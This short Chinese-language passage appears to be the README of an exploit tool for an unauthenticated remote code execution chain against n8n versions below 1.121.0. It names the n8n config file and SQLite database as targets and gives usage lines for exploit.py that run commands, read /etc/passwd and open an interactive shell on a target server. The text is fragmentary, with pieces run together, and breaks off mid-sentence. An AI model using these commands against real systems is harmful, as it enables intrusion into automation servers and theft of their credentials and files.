针对 n8n < 1.121.0 的未认证远程代码执行链(CVSS 10.0)
/home/node/.n8n/config 和 database.sqlitechild_process 执行命令# 执行命令
python3 exploit.py http://target:5678 /form/test --cmd "id"
# 读取文件
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# 交互式 Shell
python3 exploit.py http://target:5678 /form/test
目标必须具有包含以下内容的活动工作流: